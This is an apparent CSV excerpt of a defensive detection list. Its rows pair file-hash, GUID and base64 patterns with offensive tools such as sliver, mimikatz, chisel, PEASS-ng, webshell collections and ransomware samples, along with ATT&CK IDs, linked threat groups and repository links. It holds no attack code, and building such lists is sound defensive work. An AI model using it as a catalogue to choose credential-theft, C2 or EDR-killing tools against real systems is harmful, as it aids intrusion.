"*d222451147be2256c701679975cd45993377032f1d6afff27533bafda10c2afa*",".{0,1000}d222451147be2256c701679975cd45993377032f1d6afff27533bafda10c2afa.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","39507"
"*d22b0e65e8b92c408276652f2b344073684a77b5ce7bc21fda8a8b03f1f76495*",".{0,1000}d22b0e65e8b92c408276652f2b344073684a77b5ce7bc21fda8a8b03f1f76495.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39508"
"*d240dc4fa0146d782dc43ff14fc47afb81080057a2843cd2ba679a7e6b2197aa*",".{0,1000}d240dc4fa0146d782dc43ff14fc47afb81080057a2843cd2ba679a7e6b2197aa.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","39511"
"*d243029c00185f99446544ba5bb34e6c3002edd90603f4dbff8e2070c207e80c*",".{0,1000}d243029c00185f99446544ba5bb34e6c3002edd90603f4dbff8e2070c207e80c.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39512"
"*d24b17b869e71fde4c815978397d4764bf749e71f20dd1e6f2386fd0bad6b660*",".{0,1000}d24b17b869e71fde4c815978397d4764bf749e71f20dd1e6f2386fd0bad6b660.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39513"
"*D24C50F9C1F0E6AC82157B0319127ECF72E454FE5A9E86C25891B3101F957769*",".{0,1000}D24C50F9C1F0E6AC82157B0319127ECF72E454FE5A9E86C25891B3101F957769.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","39514"
"*d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980*",".{0,1000}d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","39515"
"*d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77*",".{0,1000}d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39516"
"*d256cc182755382453baf24b8f8c328104a0e65f51e236cc7acd52fa2e238534*",".{0,1000}d256cc182755382453baf24b8f8c328104a0e65f51e236cc7acd52fa2e238534.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39518"
"*d26f0536e66e9973021e728b5803d7ddeeb07f0fc4e4e1382dbda6384718cf37*",".{0,1000}d26f0536e66e9973021e728b5803d7ddeeb07f0fc4e4e1382dbda6384718cf37.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39521"
"*d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee*",".{0,1000}d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39523"
"*d2807b9860e0e4801cd00f45421b5bcab30c1a818f193e4a3d33be8f65c99ea0*",".{0,1000}d2807b9860e0e4801cd00f45421b5bcab30c1a818f193e4a3d33be8f65c99ea0.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#filehash","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","39524"
"*d2883841250ba0c96ce0e4095a612f0dd2c4419bb7e32f4873ac9da0c1053554*",".{0,1000}d2883841250ba0c96ce0e4095a612f0dd2c4419bb7e32f4873ac9da0c1053554.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","39526"
"*d2888f1714566be066719ca2bcbe9e5948a002a7f12070397b306e96442c26aa*",".{0,1000}d2888f1714566be066719ca2bcbe9e5948a002a7f12070397b306e96442c26aa.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","39527"
"*d28ac4233d53079b9f57c3dd15c024feaaffd407b26568da298c87c5d563c60c*",".{0,1000}d28ac4233d53079b9f57c3dd15c024feaaffd407b26568da298c87c5d563c60c.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","39528"
"*d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01*",".{0,1000}d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39529"
"*d28c06d99ec09ac090e9b16340daff7765f1257eea94383aa67ad1f9bf0a928c*",".{0,1000}d28c06d99ec09ac090e9b16340daff7765f1257eea94383aa67ad1f9bf0a928c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39530"
"*d2910692ffb6571d6017e93018699ef5b29d8aa30b0020729569bb5855460c72*",".{0,1000}d2910692ffb6571d6017e93018699ef5b29d8aa30b0020729569bb5855460c72.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39531"
"*d291d7237d10448e6c9941e8815757525eb03fb55a2a9afd5a48a1905e6429df*",".{0,1000}d291d7237d10448e6c9941e8815757525eb03fb55a2a9afd5a48a1905e6429df.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39532"
"*d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb*",".{0,1000}d29a6e6ff589b020cadb8f8815eafd2a1a6224a1e042e6649c9747e924048dcb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39533"
"*d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517*",".{0,1000}d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39534"
"*d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97*",".{0,1000}d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#filehash","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","39536"
"*d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc*",".{0,1000}d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","39537"
"*d2b3eeb6f1b53e1abcf5d2bd58a1708466a9d6414e5b7c0ad14d89566e7b6c7a*",".{0,1000}d2b3eeb6f1b53e1abcf5d2bd58a1708466a9d6414e5b7c0ad14d89566e7b6c7a.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","39539"
"*d2ba2c40a27cc310f8369bd19e46b5efcf954259bf229c30f4fa24f661f49504*",".{0,1000}d2ba2c40a27cc310f8369bd19e46b5efcf954259bf229c30f4fa24f661f49504.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39540"
"*d2c8ec1e20dce80ee2144540b910c5adefcd2357a13960c73501f0213f771c32*",".{0,1000}d2c8ec1e20dce80ee2144540b910c5adefcd2357a13960c73501f0213f771c32.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39542"
"*d2c8ef54b087ba42e9745f210cdc9ae431a8092ca2c2c7878a2b8329d77cb447*",".{0,1000}d2c8ef54b087ba42e9745f210cdc9ae431a8092ca2c2c7878a2b8329d77cb447.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","39543"
"*d2cb266890e46c37292349b26bff380e5a1b2ab09ec20b04a530bbfb0252fdc8*",".{0,1000}d2cb266890e46c37292349b26bff380e5a1b2ab09ec20b04a530bbfb0252fdc8.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39544"
"*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05","10","10","N/A","N/A","N/A","N/A","39546"
"*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","39547"
"*d2e1fecf21091637be0e6d72ad7bca6bfb5e6bb4e59e093bb57907fe3a14c9b6*",".{0,1000}d2e1fecf21091637be0e6d72ad7bca6bfb5e6bb4e59e093bb57907fe3a14c9b6.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","39548"
"*d2ea7a48b45df38e486ffe3757119d2257cd4b2a560ca67c463aff63e9a34a0d*",".{0,1000}d2ea7a48b45df38e486ffe3757119d2257cd4b2a560ca67c463aff63e9a34a0d.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","39549"
"*d2eaa9862ed7aa1d38f19684757cc30a8f7b9b4f0fb1bd96d6fff0948c7326fa*",".{0,1000}d2eaa9862ed7aa1d38f19684757cc30a8f7b9b4f0fb1bd96d6fff0948c7326fa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39550"
"*d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d*",".{0,1000}d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39552"
"*d2f2208befd430af548bf911e596fb11381d60179caf6a8b80d1ded689787e16*",".{0,1000}d2f2208befd430af548bf911e596fb11381d60179caf6a8b80d1ded689787e16.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39553"
"*d2fe624c63b655021b81ba91f90618cb9fc9ea56535117e945f41912cd9f2cd5*",".{0,1000}d2fe624c63b655021b81ba91f90618cb9fc9ea56535117e945f41912cd9f2cd5.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","39555"
"*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*",".{0,1000}d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","39556"
"*d2hvYW1p*",".{0,1000}d2hvYW1p.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","39557"
"*D305F8A3-019A-4CDF-909C-069D5B483613*",".{0,1000}D305F8A3\-019A\-4CDF\-909C\-069D5B483613.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#GUIDproject","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","39558"
"*d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8*",".{0,1000}d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39559"
"*d3099edc6d73f362aa7672cfa3d7e0af5254484a4af0d5ac65da2eae8c229512*",".{0,1000}d3099edc6d73f362aa7672cfa3d7e0af5254484a4af0d5ac65da2eae8c229512.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39560"
"*D30C9D6B-1F45-47BD-825B-389FE8CC9069*",".{0,1000}D30C9D6B\-1F45\-47BD\-825B\-389FE8CC9069.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#GUIDproject","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","39562"
"*D30C9D6B-1F45-47BD-825B-389FE8CC9069*",".{0,1000}D30C9D6B\-1F45\-47BD\-825B\-389FE8CC9069.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","#GUIDproject","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","39563"
"*d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e*",".{0,1000}d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39564"
"*d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e*",".{0,1000}d30f51bfd62695df96ba94cde14a7fae466b29ef45252c6ad19d57b4a87ff44e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39565"
"*d31689572f9c5c80ca601075267a0db0e32b89665f039e721b27f6b9536c3be2*",".{0,1000}d31689572f9c5c80ca601075267a0db0e32b89665f039e721b27f6b9536c3be2.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","39566"
